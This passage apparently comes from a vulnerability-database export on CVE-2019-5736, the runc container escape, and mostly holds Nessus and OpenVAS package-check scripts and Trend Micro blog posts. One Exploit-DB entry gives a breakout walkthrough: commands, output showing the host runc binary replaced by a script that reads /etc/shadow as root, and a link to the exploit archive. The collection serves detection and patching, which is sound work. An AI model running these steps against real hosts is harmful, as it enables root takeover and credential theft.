'cpu':'aarch64', 'release':'8'},\n {'reference':'runc-debugsource-1.0.0-55.rc5.dev.git2abd837.module+el8.0.0+3049+59fd2bba', 'cpu':'s390x', 'release':'8'},\n {'reference':'runc-debugsource-1.0.0-55.rc5.dev.git2abd837.module+el8.0.0+3049+59fd2bba', 'cpu':'x86_64', 'release':'8'},\n {'reference':'skopeo-0.1.32-3.git1715c90.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8', 'epoch':'1'},\n {'reference':'skopeo-0.1.32-3.git1715c90.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8', 'epoch':'1'},\n {'reference':'skopeo-0.1.32-3.git1715c90.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8', 'epoch':'1'},\n {'reference':'skopeo-debugsource-0.1.32-3.git1715c90.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8', 'epoch':'1'},\n {'reference':'skopeo-debugsource-0.1.32-3.git1715c90.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8', 'epoch':'1'},\n {'reference':'skopeo-debugsource-0.1.32-3.git1715c90.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8', 'epoch':'1'},\n {'reference':'slirp4netns-0.1-2.dev.gitc4e1bc5.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8'},\n {'reference':'slirp4netns-0.1-2.dev.gitc4e1bc5.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8'},\n {'reference':'slirp4netns-0.1-2.dev.gitc4e1bc5.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8'},\n {'reference':'slirp4netns-debugsource-0.1-2.dev.gitc4e1bc5.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8'},\n {'reference':'slirp4netns-debugsource-0.1-2.dev.gitc4e1bc5.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8'},\n {'reference':'slirp4netns-debugsource-0.1-2.dev.gitc4e1bc5.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8'}\n ],\n};\n\nflag = 0;\nappstreams_found = 0;\nforeach module (keys(appstreams)) {\n appstream = NULL;\n appstream_name = NULL;\n appstream_version = NULL;\n appstream_split = split(module, sep:':', keep:FALSE);\n if (!empty_or_null(appstream_split)) {\n appstream_name = appstream_split[0];\n appstream_version = appstream_split[1];\n if (!empty_or_null(appstream_name)) appstream = get_one_kb_item('Host/RedHat/appstream/' + appstream_name);\n }\n if (!empty_or_null(appstream) && appstream_version == appstream || appstream_name == 'all') {\n appstreams_found++;\n foreach package_array ( appstreams[module] ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n }\n }\n}\n\nif (!appstreams_found) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module container-tools:rhel8');\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'buildah / buildah-debugsource / container-selinux / etc');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:06:07", "description": "\nrunc 1.0-rc6 (Docker 18.09.2) - Container Breakout (2)", "edition": 1, "published": "2019-02-13T00:00:00", "title": "runc 1.0-rc6 (Docker 18.09.2) - Container Breakout (2)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-5736"], "modified": "2019-02-13T00:00:00", "id": "EXPLOITPACK:A525E32FDF6F1ECE16D67E1741C48E11", "href": "", "sourceData": "## CVE-2019-5736 ##\n\nThis is exploit code for CVE-2019-5736 (and it works for both runc and LXC).\nThe simplest way to use it is to copy the exploit code into an existing\ncontainer, and run `make.sh`. However, you could just as easily create a bad\nimage and run that.\n\n```console\n% docker run --rm --name pwnme -dit ubuntu:18.10 bash\npwnme\n% docker cp CVE-2019-5736.tar pwnme:/CVE-2019-5736.tar\n```\n\nWe need to install `gcc` to build the exploit, and `runc` because we need to\nhave the shared libraries that `runc` would use. We don't actually use the\n`runc` binary itself. For LXC, you would install `lxc` instead of `runc`.\n\n```console\n% docker attach pwnme\n# apt-get update && apt-get install -y gcc runc\n[ snip ]\n# tar xf CVE-2019-5736.tar\n# ./CVE-2019-5736/make.sh\n```\n\nAnd now, `/bin/bash` in the container will be able to **overwrite the host runc\nbinary**. Since this binary is often executed by `root`, this allows for\nroot-level code execution on the host.\n\n```\n% docker exec -it pwnme /bin/bash\n[+] bad_libseccomp.so booted.\n[+] opened ro /proc/self/exe <3>.\n[+] constructed fdpath </proc/self/fd/3>\n[+] bad_init is ready -- see </tmp/bad_init_log> for logs.\n[*] dying to allow /proc/self/exe to be unused...\n% cat /usr/sbin/docker-runc\n#!/bin/bash\ntouch /w00t_w00t ; cat /etc/shadow\n```\n\nAnd now if you try to use Docker normally, the malicious script will execute\nwith root privileges:\n\n```\n% docker exec -it pwnme /bin/good_bash\nOCI runtime state failed: invalid character 'b' looking for beginning of value: unknown\n% file /w00t_w00t\n/w00t_w00t: empty\n```\n\nAnd obviously `make.sh` can be modified to make the evil path anything you\nlike. If you want to get access to the container, use `/bin/good_bash`.\n\n### License ###\n\n```\nCopyright (C) 2019 Aleksa Sarai <cyphar@cyphar.com>\nVulnerability discovered by Adam Iwaniuk and Borys Pop\u0142awski.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to\ndeal in the Software without restriction, including without limitation the\nrights to use, copy, modify, merge, publish, distribute, sublicense, and/or\nsell copies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\n* The above copyright notice and this permission notice shall be included in\n all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\nFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\nIN THE SOFTWARE.\n```\n\n\nDownload: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46369.zip", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2019-03-01T16:18:24", "bulletinFamily": "blog", "cvelist": ["CVE-2019-5736"], "description": "\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how a group of hackers is stealing popular Instagram profiles. Also, learn about old and new cybersecurity issues inundated enterprises in 2018.\n\nRead on:\n\n[**Insecure VPNs: Top risks and symptoms that stronger security is needed**](<https://blog.trendmicro.com/insecure-vpns-top-risks-and-symptoms-that-stronger-security-is-needed/>)\n\n_While users hope and expect that VPNs will live up to their name and truly support a virtual and private connection, research shows that this is not always the case._** **\n\n[**U.S. Cyber Command Operation Disrupted Internet Access of Russian Troll Factory on Day of 2018 Midterms**](<https://www.washingtonpost.com/world/national-security/us-cyber-command-operation-disrupted-internet-access-of-russian-troll-factory-on-day-of-2018-midterms/2019/02/26/1827fc9e-36d6-11e9-af5b-b51b7ff322e9_story.html?noredirect=on&utm_term=.910d209f6acb>)\n\n_The U.S. military blocked Internet access to an infamous Russian entity seeking to cause discord among Americans during the 2018 midterms._** **\n\n[**How a Hacking Group is Stealing Popular Instagram Profiles**](<https://blog.trendmicro.com/trendlabs-security-intelligence/how-a-hacking-group-is-stealing-popular-instagram-profiles/>)\n\n_Trend Micro found that targeting popular Instagram profiles has become a modus for a certain group of Turkish-speaking hackers through phishing attacks and digital extortion._** **\n\n[**Attackers Continue to Focus on Users, Well-Worn Techniques**](<https://www.darkreading.com/threat-intelligence/attackers-continue-to-focus-on-users-well-worn-techniques/d/d-id/1333960>)\n\n_According to Trend Micro\u2019s 2018 Roundup Report, traditional attacks such as phishing and credential stuffing continue to dominate the threat landscape for most industries while well-known malware remain a threat for behind-the-curve companies._** **\n\n[**CVE-2019-5736: RunC Container Escape Vulnerability Provides Root Access to the Target Machine**](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/cve-2019-5736-runc-container-escape-vulnerability-provides-root-access-to-the-target-machine>)\n\n_CVE-2019-5736 is a vulnerability involving the runC runtime component, which is used for container platforms such as Docker and container orchestration platforms such as Kubernetes._** **\n\n[**Congress Considers a National Standard for Data Privacy**](<https://www.zdnet.com/article/congress-considers-a-national-standard-for-data-privacy/>)\n\n_The conversations on nationwide data privacy rules kicked off with a hearing in a subpanel of the House Energy and Commerce Committee._** **\n\n[**Caught in the Net: Unraveling the Tangle of Old and New Threats**](<https://www.trendmicro.com/vinfo/us/security/research-and-analysis/threat-reports/roundup/unraveling-the-tangle-of-old-and-new-threats>)\n\n_Trend Micro saw a shift in cybercriminal strategies and lingering security threats. Enterprises faced a multitude of challenges, but careful study of these issues can present opportunities for improvement.__ _\n\n**[Europe is Prepared to Rule Over 5G Cybersecurity](<https://techcrunch.com/2019/02/25/europe-is-prepared-to-rule-over-5g-cybersecurity/>)**\n\n_At Mobile World Congress, the European Commission\u2019s digital commissioner warned the mobile industry to expect it to act over security concerns attached to Chinese network equipment makers, including Huawei._\n\nDo you think there will be more attacks on high-profile social media accounts or influencers this year? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\nThe post [This Week in Security News: Instagram Hackers and Enterprise Threats](<https://blog.trendmicro.com/this-week-in-security-news-instagram-hackers-and-enterprise-threats/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2019-03-01T14:57:50", "published": "2019-03-01T14:57:50", "id": "TRENDMICROBLOG:A8C47E018FA9A3D0723FC3A99FD592A7", "href": "https://blog.trendmicro.com/this-week-in-security-news-instagram-hackers-and-enterprise-threats/", "type": "trendmicroblog", "title": "This Week in Security News: Instagram Hackers and Enterprise Threats", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-20T09:44:48", "bulletinFamily": "blog", "cvelist": ["CVE-2019-5736"], "description": "\n\nThis week a new vulnerability was published ([CVE-2019-5736](<https://nvd.nist.gov/vuln/detail/CVE-2019-5736>)) that highlights everything bad and good about containers. Simply put, this vulnerability can be exploited using an infected container to attack the host. It\u2019s a real world example of a breakout attack that has long been a major concern in virtualized and container environment.\n\nHere, the attack highlights the biggest security weakness of containers: they are loosely isolated sharing the same host operating system. This is in stark contrast to virtual machines which are isolated instances of a complete operating system.\n\n## CVE-2019-5736\n\nThe vulnerability itself can be exploited by an attacker using a custom container or by gaining write access to an existing container. They then can manipulate the symbolic process link (/proc/self/exe/) in order to overwrite the runC library. [runC](<https://github.com/opencontainers/runc>) is portable, lightweight container runtime. It\u2019s a critical piece of container infrastructure.\n\nIn this attack, once runC is overwritten and under the attackers control, they own the host and\u2014potentially\u2014any container running on it.\n\nThat\u2019s a devastating foothold and is why this vulnerability has a CVSSv3 score of 7.2 or \u201chigh\u201d. A score this high means that you should mitigate or fix the vulnerability as soon as possible.\n\n> For Trend Micro customers using Deep Security to protect their container hosts, [this knowledge base article](<https://success.trendmicro.com/solution/1122066>) explains the rules that you can use to both detect and prevent this issue until you have the opportunity to deploy a patch to your infrastructure.\n\n## A Container Refresher\n\nWhen reading about a vulnerability like this, the natural question to ask is, \u201cWhy isn\u2019t there a firmer line between containers on the same host?\u201d. The answer is a complicated one.\n\nTo start with, containers are not designed to solve security challenges. They were designed to tackle a very specific development challenge: dependency nightmares.\n\nAny application you write is built on layers of other teams code. Whether it\u2019s the framework you\u2019re using directly, standard libraries provided by your programming language, services made available by the OS, or even resources provided in hardware, you code does not stand alone.\n\nThis leads to a web of interdependencies and requirements for your code to run. For a very long time, developers faced a challenge documenting all of these dependencies and ensuring they were met in production environments.\n\nIf you\u2019ve ever heard a developer exclaim, \u201cIt worked on my machine!\u201d. You understand the problem.\n\nContainers were designed to make it easy to package all of an applications dependencies in a portable fashion. This helps with deployment, versioning, and a number of other delivery challenges.\n\nIn this respect containers are a fantastic step forward for developer efficiency.\n\n## The Downside of Containers\n\nThis efficiency for developers comes at the cost of infrastructure complexity. Often overlooked is the security of the container host, network complexity, and the integrity of the build pipeline.\n\nIn the case of CVE-2019-5736, the container host\u2019s security is paramount. Hardening the hosts operating system by reducing the number of available services\u2014it should only run the container runtime, host security controls, and host monitoring applications\u2014to the bare minimum is critical to security success.\n\nFurthermore, using security controls like integrity monitoring, log inspection, and application control will ensure that you hardened configuration **stays** that way.\n\nThis vulnerability demonstrates that each container can be risk to the host. The easiest analogy here comes from noted container expert [Kelsey Hightower](<https://twitter.com/kelseyhightower?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>), he compared virtual machines to single houses (isolated, rarely impacting their neighbours) and containers to apartments. If you upstairs neighbour is always banging on the floor, you have a problem.\n\nCVE-2019-5736 is the distinct possibility of having a neighbour who throws a crazy party that trashes not only their own apartment but the hall, elevator, and lobby. Everyone has to deal with that mess.\n\n## The Upside\n\nThis issue also demonstrates the upside of the container model. Containers are designed for a highly automated and dynamic environment. In order to resolve this issue, the container runtime will need to be protected and then patched.\n\nThese measures may impact the availability of each host. The advantage? You can simply spin up a new version of your container on an already protected or patched host.\n\nTake for example the list of [affected AWS services](<https://aws.amazon.com/security/security-bulletins/AWS-2019-002/>). In each of these cases, [a rolling update](<https://www.dropbox.com/sh/3vm31z18xrhvm2k/AABAHh7jwu2u1u7rpK4XZrf6a?dl=0>) or blue/green deployment is possible in order to address the issue within impacting your users.\n\nIf your CI/CD pipeline is setup\u2014and if you\u2019re using containers, it should be\u2014a simple re-deployment to known good hosts will mitigate the issue. This is a prime example of the advantages of a highly automated build pipeline.\n\nNo special processes are required. Simply mitigate or patch the hosts and run your build again. DevOps culture FTW.\n\n## Next Steps\n\nThis won\u2019t be the last security issue in your container environment. Containers were designed to improve developer efficiency. Security is a priority for the teams working on the projects\u2014like runC\u2014that make containers work but there will always be security issues that pop up.\n\nIf you\u2019re following best practices and have automated your build and deployment pipeline, these issues shouldn\u2019t impact your end users. At worst, it should mean adding a new security rule or two to your tool set, adding a new security test to your build (to prevent recurrence), and a rolling update.\n\nIt\u2019s also a reminder that the security of your container host is **paramount** to the security of your container infrastructure. Take this opportunity to review the security posture of these hosts and if you haven\u2019t already, deploy a strong set of security controls that include [integrity monitoring](<https://en.wikipedia.org/wiki/File_integrity_monitoring>) and [application control](<https://en.wikipedia.org/wiki/Whitelisting#Application_whitelists>).\n\nThe post [Attacking Containers and runC](<https://blog.trendmicro.com/attacking-containers-and-runc/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2019-02-12T19:22:35", "published": "2019-02-12T19:22:35", "id": "TRENDMICROBLOG:DD93FD0A6FE52A3DFF89C6F550E981D1", "href": "https://blog.trendmicro.com/attacking-containers-and-runc/", "type": "trendmicroblog", "title": "Attacking Containers and runC", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:32:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2019-05-14T00:00:00", "published": "2019-05-07T00:00:00", "id": "OPENVAS:1361412562310875688", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875688", "type": "openvas", "title": "Fedora Update for runc FEDORA-2019-3f19f13ecd", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875688\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-07 02:16:13 +0000 (Tue, 07 May 2019)\");\n script_name(\"Fedora Update for runc FEDORA-2019-3f19f13ecd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-3f19f13ecd\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3UBRCQV7DJSPM4I25KSQILXWKNX37F5I\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'runc'\n package(s) announced via the FEDORA-2019-3f19f13ecd advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The runc command can be used to start containers which are packaged\nin accordance with the Open Container Initiative&#39, s specifications,\nand to manage containers running under runc.\");\n\n script_tag(name:\"affected\", value:\"'runc' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"runc\", rpm:\"runc~1.0.0~68.dev.git6635b4f.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-09-10T14:46:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2019-09-10T00:00:00", "published": "2019-09-07T00:00:00", "id": "OPENVAS:1361412562310876767", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876767", "type": "openvas", "title": "Fedora Update for lxcfs FEDORA-2019-c1dac1b3b8", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876767\");\n script_version(\"2019-09-10T08:05:24+0000\");\n script_cve_id(\"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-09-10 08:05:24 +0000 (Tue, 10 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-09-07 02:24:06 +0000 (Sat, 07 Sep 2019)\");\n script_name(\"Fedora Update for lxcfs FEDORA-2019-c1dac1b3b8\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-c1dac1b3b8\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/744HVBCKN5JUL3CHQ24OQUR76WXCYQ2W\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lxcfs'\n package(s) announced via the FEDORA-2019-c1dac1b3b8 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"LXCFS is a simple userspace filesystem designed to work around some\ncurrent limitations of the Linux kernel.\n\nSpecifically, it&#39, s providing two main things\n\n - A set of files which can be bind-mounted over their /proc originals\n to provide CGroup-aware values.\n\n - A cgroupfs-like tree which is container aware.\n\nThe code is pretty simple, written in C using libfuse.\n\nThe main driver for this work was the need to run systemd based\ncontainers as a regular unprivileged user while still allowing systemd\ninside the container to interact with cgroups.\n\nNow with the introduction of the cgroup namespace in the Linux kernel,\nthat part is no longer necessary on recent kernels and focus is now on\nmaking containers feel more like a real independent system through the\nproc masking feature.\");\n\n script_tag(name:\"affected\", value:\"'lxcfs' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"lxcfs\", rpm:\"lxcfs~3.0.4~1.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2019-05-14T00:00:00", "published": "2019-05-07T00:00:00", "id": "OPENVAS:1361412562310875706", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875706", "type": "openvas", "title": "Fedora Update for runc FEDORA-2019-bc70b381ad", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875706\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-07 02:17:06 +0000 (Tue, 07 May 2019)\");\n script_name(\"Fedora Update for runc FEDORA-2019-bc70b381ad\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-bc70b381ad\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V6A4OSFM5GGOWW4ECELV5OHX2XRAUSPH\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'runc'\n package(s) announced via the FEDORA-2019-bc70b381ad advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The runc command can be used to start containers which are packaged\nin accordance with the Open Container Initiative&#39, s specifications,\nand to manage containers running under runc.\");\n\n script_tag(name:\"affected\", value:\"'runc' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"runc\", rpm:\"runc~1.0.0~92.dev.gitc1b8c57.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-09-10T14:49:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2019-09-10T00:00:00", "published": "2019-09-07T00:00:00", "id": "OPENVAS:1361412562310876762", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876762", "type": "openvas", "title": "Fedora Update for python3-lxc FEDORA-2019-2baa1f7b19", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876762\");\n script_version(\"2019-09-10T08:05:24+0000\");\n script_cve_id(\"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-09-10 08:05:24 +0000 (Tue, 10 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-09-07 02:24:04 +0000 (Sat, 07 Sep 2019)\");\n script_name(\"Fedora Update for python3-lxc FEDORA-2019-2baa1f7b19\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 